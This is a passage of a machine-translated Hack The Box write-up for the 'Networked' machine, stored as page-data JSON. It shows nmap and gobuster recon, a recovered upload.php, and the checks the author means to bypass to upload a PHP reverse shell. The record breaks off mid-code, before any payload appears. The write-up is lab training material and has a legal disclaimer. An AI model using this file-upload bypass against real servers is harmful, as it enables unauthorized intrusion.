{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-linux-networked-en","result":{"data":{"markdownRemark":{"id":"0cf9d9ff-7583-538b-9150-a635f18b058d","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-linux-networked\">original page</a>.</p>\n</blockquote>\n<p>I am studying security using “Hack The Box,” a penetration testing learning platform.\nMy Hack The Box rank at the time of writing is ProHacker.</p>\n<span class=\"gatsby-resp-image-wrapper\" style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 220px; \">\n      <a class=\"gatsby-resp-image-link\" href=\"/static/c0133de27cc96db7d5bc25f09474c58c/c8042/327080.png\" style=\"display: block\" target=\"_blank\" rel=\"noopener\">\n    <span class=\"gatsby-resp-image-background-image\" style=\"padding-bottom: 22.727272727272727%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"></span>\n  <picture>\n          <source srcset=\"/static/c0133de27cc96db7d5bc25f09474c58c/b5458/327080.webp 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/webp\">\n          <source srcset=\"/static/c0133de27cc96db7d5bc25f09474c58c/c8042/327080.png 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/png\">\n          <img class=\"gatsby-resp-image-image\" src=\"/static/c0133de27cc96db7d5bc25f09474c58c/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\" loading=\"lazy\" style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\">\n        </picture>\n  </a>\n    </span>\n<p>This is a writeup for the retired HackTheBox machine “Networked.”</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor 
before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to promote acts that violate social order.</strong></p>\n<p>Please be aware in advance that attempting to attack environments other than your own or environments for which you have permission may violate the “Act on Prohibition of Unauthorized Computer Access” (Unauthorized Access Prohibition Act).</p>\n<p>All opinions expressed are my own and do not represent those of any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li>\n<p><a href=\"#analyzing-the-php-files\">Analyzing the PHP Files</a></p>\n<ul>\n<li><a href=\"#embedding-a-php-script-in-an-image-file-using-exiftool\">Embedding a PHP Script in an Image File Using exiftool</a></li>\n<li><a 
href=\"#obtaining-user-privileges\">Obtaining User Privileges</a></li>\n<li><a href=\"#getting-a-user-level-shell\">Getting a User-Level Shell</a></li>\n</ul>\n</li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>I start with a port scan.</p>\n<p>Port 80 is open.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ nmap -sV -sC -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\n\nPORT    STATE  SERVICE VERSION\n<span class=\"token number\">22</span>/tcp  <span class=\"token function\">open</span>   <span class=\"token function\">ssh</span>     OpenSSH <span class=\"token number\">7.4</span> <span class=\"token punctuation\">(</span>protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">2048</span> <span class=\"token number\">22</span>:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b <span class=\"token punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">256</span> 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 <span 
class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> <span class=\"token number\">73</span>:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp  <span class=\"token function\">open</span>   http    Apache httpd <span class=\"token number\">2.4</span>.6 <span class=\"token punctuation\">((</span>CentOS<span class=\"token punctuation\">)</span> PHP/5.4.16<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_http-title: Site doesn't have a title <span class=\"token punctuation\">(</span>text/html<span class=\"token punctuation\">;</span> <span class=\"token assign-left variable\">charset</span><span class=\"token operator\">=</span>UTF-8<span class=\"token punctuation\">)</span>.\n<span class=\"token operator\">|</span>_http-server-header: Apache/2.4.6 <span class=\"token punctuation\">(</span>CentOS<span class=\"token punctuation\">)</span> PHP/5.4.16\n<span class=\"token number\">443</span>/tcp closed https</code></pre></div>\n<p>Next, I open the machine’s address in a browser.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 569px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b545468c9dfe85a84b109068bb26a1d1/854dc/image-20220526001201381.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 45.833333333333336%; position: relative; bottom: 0; left: 0; background-image: 
none; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b545468c9dfe85a84b109068bb26a1d1/8ac56/image-20220526001201381.webp 240w,\n/static/b545468c9dfe85a84b109068bb26a1d1/d3be9/image-20220526001201381.webp 480w,\n/static/b545468c9dfe85a84b109068bb26a1d1/0fe84/image-20220526001201381.webp 569w\"\n              sizes=\"(max-width: 569px) 100vw, 569px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b545468c9dfe85a84b109068bb26a1d1/8ff5a/image-20220526001201381.png 240w,\n/static/b545468c9dfe85a84b109068bb26a1d1/e85cb/image-20220526001201381.png 480w,\n/static/b545468c9dfe85a84b109068bb26a1d1/854dc/image-20220526001201381.png 569w\"\n            sizes=\"(max-width: 569px) 100vw, 569px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b545468c9dfe85a84b109068bb26a1d1/854dc/image-20220526001201381.png\"\n            alt=\"image-20220526001201381\"\n            title=\"image-20220526001201381\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I ran an automatic scan with OWASP ZAP but nothing of note came up.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; 
max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/07793adf052e7eb72b59ad1e5bdd2293/ee515/image-20220526002306955.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 76.66666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/07793adf052e7eb72b59ad1e5bdd2293/8ac56/image-20220526002306955.webp 240w,\n/static/07793adf052e7eb72b59ad1e5bdd2293/d3be9/image-20220526002306955.webp 480w,\n/static/07793adf052e7eb72b59ad1e5bdd2293/e46b2/image-20220526002306955.webp 960w,\n/static/07793adf052e7eb72b59ad1e5bdd2293/a5e36/image-20220526002306955.webp 1269w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/07793adf052e7eb72b59ad1e5bdd2293/8ff5a/image-20220526002306955.png 240w,\n/static/07793adf052e7eb72b59ad1e5bdd2293/e85cb/image-20220526002306955.png 480w,\n/static/07793adf052e7eb72b59ad1e5bdd2293/d9199/image-20220526002306955.png 960w,\n/static/07793adf052e7eb72b59ad1e5bdd2293/ee515/image-20220526002306955.png 1269w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/07793adf052e7eb72b59ad1e5bdd2293/d9199/image-20220526002306955.png\"\n            alt=\"image-20220526002306955\"\n            title=\"image-20220526002306955\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>So I use <code 
class=\"language-text\">gobuster</code> for directory enumeration.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ gobuster <span class=\"token function\">dir</span> -u http://<span class=\"token variable\">$RHOST</span>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t <span class=\"token number\">40</span> <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> gobuster1.txt\n\n/uploads              <span class=\"token punctuation\">(</span>Status: <span class=\"token number\">301</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">[</span>Size: <span class=\"token number\">238</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span>--<span class=\"token operator\">></span> http://<span class=\"token variable\">$RHOST</span>/uploads/<span class=\"token punctuation\">]</span>\n/backup               <span class=\"token punctuation\">(</span>Status: <span class=\"token number\">301</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">[</span>Size: <span class=\"token number\">237</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span>--<span class=\"token operator\">></span> http://<span class=\"token variable\">$RHOST</span>/backup/<span class=\"token punctuation\">]</span> </code></pre></div>\n<p>A path called <code class=\"language-text\">backup</code> is found, and from here I can retrieve the PHP scripts running on the server.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 579px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/81301ad0611046782a3110dab0f2529e/c08bc/image-20220526002810194.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n  
  <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 51.66666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/81301ad0611046782a3110dab0f2529e/8ac56/image-20220526002810194.webp 240w,\n/static/81301ad0611046782a3110dab0f2529e/d3be9/image-20220526002810194.webp 480w,\n/static/81301ad0611046782a3110dab0f2529e/0c108/image-20220526002810194.webp 579w\"\n              sizes=\"(max-width: 579px) 100vw, 579px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/81301ad0611046782a3110dab0f2529e/8ff5a/image-20220526002810194.png 240w,\n/static/81301ad0611046782a3110dab0f2529e/e85cb/image-20220526002810194.png 480w,\n/static/81301ad0611046782a3110dab0f2529e/c08bc/image-20220526002810194.png 579w\"\n            sizes=\"(max-width: 579px) 100vw, 579px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/81301ad0611046782a3110dab0f2529e/c08bc/image-20220526002810194.png\"\n            alt=\"image-20220526002810194\"\n            title=\"image-20220526002810194\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">tar</span> -xvf backup.tar \nindex.php\nlib.php\nphotos.php\nupload.php</code></pre></div>\n<h2 id=\"analyzing-the-php-files\" style=\"position:relative;\"><a href=\"#analyzing-the-php-files\" aria-label=\"analyzing the php files permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" 
focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Analyzing the PHP Files</h2>\n<p>Among the downloaded files, I look at <code class=\"language-text\">upload.php</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"># upload.php\n<span class=\"token php language-php\"><span class=\"token delimiter important\">&lt;?php</span>\n<span class=\"token keyword\">require</span> <span class=\"token string single-quoted-string\">'/var/www/html/lib.php'</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token function\">define</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"UPLOAD_DIR\"</span><span class=\"token punctuation\">,</span> <span class=\"token string double-quoted-string\">\"/var/www/html/uploads/\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token keyword\">if</span><span class=\"token punctuation\">(</span> <span class=\"token keyword\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'submit'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span><span class=\"token 
keyword\">empty</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span><span class=\"token string double-quoted-string\">\"myFile\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token variable\">$myFile</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span><span class=\"token string double-quoted-string\">\"myFile\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span><span class=\"token punctuation\">(</span><span class=\"token function\">check_file_type</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span><span class=\"token string double-quoted-string\">\"myFile\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;&amp;</span> <span class=\"token function\">filesize</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'myFile'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'tmp_name'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&lt;</span> <span class=\"token number\">60000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n      <span class=\"token 
keyword\">echo</span> <span class=\"token string single-quoted-string\">'&lt;pre>Invalid image file.&lt;/pre>'</span><span class=\"token punctuation\">;</span>\n      <span class=\"token function\">displayform</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$myFile</span><span class=\"token punctuation\">[</span><span class=\"token string double-quoted-string\">\"error\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">!==</span> <span class=\"token constant\">UPLOAD_ERR_OK</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"&lt;p>An error occurred.&lt;/p>\"</span><span class=\"token punctuation\">;</span>\n        <span class=\"token function\">displayform</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token keyword\">exit</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n\n    <span class=\"token comment\">//$name = $_SERVER['REMOTE_ADDR'].'-'. 
$myFile[\"name\"];</span>\n    <span class=\"token keyword\">list</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$foo</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$ext</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=</span> <span class=\"token function\">getnameUpload</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$myFile</span><span class=\"token punctuation\">[</span><span class=\"token string double-quoted-string\">\"name\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token variable\">$validext</span> <span class=\"token operator\">=</span> <span class=\"token keyword\">array</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'.jpg'</span><span class=\"token punctuation\">,</span> <span class=\"token string single-quoted-string\">'.png'</span><span class=\"token punctuation\">,</span> <span class=\"token string single-quoted-string\">'.gif'</span><span class=\"token punctuation\">,</span> <span class=\"token string single-quoted-string\">'.jpeg'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token variable\">$valid</span> <span class=\"token operator\">=</span> <span class=\"token constant boolean\">false</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">foreach</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$validext</span> <span class=\"token keyword\">as</span> <span class=\"token variable\">$vext</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n      <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">substr_compare</span><span class=\"token 
punctuation\">(</span><span class=\"token variable\">$myFile</span><span class=\"token punctuation\">[</span><span class=\"token string double-quoted-string\">\"name\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$vext</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">-</span><span class=\"token function\">strlen</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$vext</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">===</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token variable\">$valid</span> <span class=\"token operator\">=</span> <span class=\"token constant boolean\">true</span><span class=\"token punctuation\">;</span>\n      <span class=\"token punctuation\">}</span>\n    <span class=\"token punctuation\">}</span>\n\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$valid</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n      <span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"&lt;p>Invalid image file&lt;/p>\"</span><span class=\"token punctuation\">;</span>\n      <span class=\"token function\">displayform</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n      <span class=\"token keyword\">exit</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n    <span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span 
class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'.'</span><span class=\"token punctuation\">,</span><span class=\"token string single-quoted-string\">'_'</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'REMOTE_ADDR'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token operator\">.</span><span class=\"token string single-quoted-string\">'.'</span><span class=\"token operator\">.</span><span class=\"token variable\">$ext</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token variable\">$success</span> <span class=\"token operator\">=</span> <span class=\"token function\">move_uploaded_file</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$myFile</span><span class=\"token punctuation\">[</span><span class=\"token string double-quoted-string\">\"tmp_name\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">UPLOAD_DIR</span> <span class=\"token operator\">.</span> <span class=\"token variable\">$name</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span><span class=\"token variable\">$success</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"&lt;p>Unable to save file.&lt;/p>\"</span><span class=\"token punctuation\">;</span>\n        <span class=\"token keyword\">exit</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n    
<span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"&lt;p>file uploaded, refresh gallery&lt;/p>\"</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token comment\">// set proper permissions on the new file</span>\n    <span class=\"token function\">chmod</span><span class=\"token punctuation\">(</span><span class=\"token constant\">UPLOAD_DIR</span> <span class=\"token operator\">.</span> <span class=\"token variable\">$name</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0644</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span> <span class=\"token keyword\">else</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token function\">displayform</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n<span class=\"token delimiter important\">?></span></span></code></pre></div>\n<p>This appears to be an application that allows image file uploads.</p>\n<p>Ultimately, I want to upload a PHP file that can give me a reverse shell, but I need to bypass the following conditions:</p>\n<ul>\n<li><code class=\"language-text\">isset($_POST['submit'])</code></li>\n<li><code class=\"language-text\">!empty($_FILES[\"myFile\"]</code></li>\n<li><code class=\"language-text\">!(check_file_type($_FILES[\"myFile\"]) &amp;&amp; filesize($_FILES['myFile']['tmp_name']) &lt; 60000)</code></li>\n<li><code class=\"language-text\">substr_compare($myFile[\"name\"], $vext, -strlen($vext)) === 0</code></li>\n</ul>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"><span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token 
function\">str_replace</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'.'</span><span class=\"token punctuation\">,</span><span class=\"token string single-quoted-string\">'_'</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'REMOTE_ADDR'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token operator\">.</span><span class=\"token string single-quoted-string\">'.'</span><span class=\"token operator\">.</span><span class=\"token variable\">$ext</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$success</span> <span class=\"token operator\">=</span> <span class=\"token function\">move_uploaded_file</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$myFile</span><span class=\"token punctuation\">[</span><span class=\"token string double-quoted-string\">\"tmp_name\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">UPLOAD_DIR</span> <span class=\"token operator\">.</span> <span class=\"token variable\">$name</span><span class=\"token punctuation\">)</span>\n<span class=\"token function\">chmod</span><span class=\"token punctuation\">(</span><span class=\"token constant\">UPLOAD_DIR</span> <span class=\"token operator\">.</span> <span class=\"token variable\">$name</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0644</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>I’ll work on bypassing these.</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"><span class=\"token keyword\">function</span> <span class=\"token function-definition 
function\">file_mime_type</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$file</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token variable\">$regexp</span> <span class=\"token operator\">=</span> <span class=\"token string single-quoted-string\">'/^([a-z\\-]+\\/[a-z0-9\\-\\.\\+]+)(;\\s.+)?$/'</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">function_exists</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'finfo_file'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token variable\">$finfo</span> <span class=\"token operator\">=</span> <span class=\"token function\">finfo_open</span><span class=\"token punctuation\">(</span><span class=\"token constant\">FILEINFO_MIME</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">is_resource</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$finfo</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token comment\">// It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system</span>\n    <span class=\"token punctuation\">{</span>\n      <span class=\"token variable\">$mime</span> <span class=\"token operator\">=</span> @<span class=\"token function\">finfo_file</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$finfo</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$file</span><span class=\"token punctuation\">[</span><span 
class=\"token string single-quoted-string\">'tmp_name'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n      <span class=\"token function\">finfo_close</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$finfo</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n      <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">is_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$mime</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;&amp;</span> <span class=\"token function\">preg_match</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$regexp</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$mime</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$matches</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token variable\">$file_type</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$matches</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n        <span class=\"token keyword\">return</span> <span class=\"token variable\">$file_type</span><span class=\"token 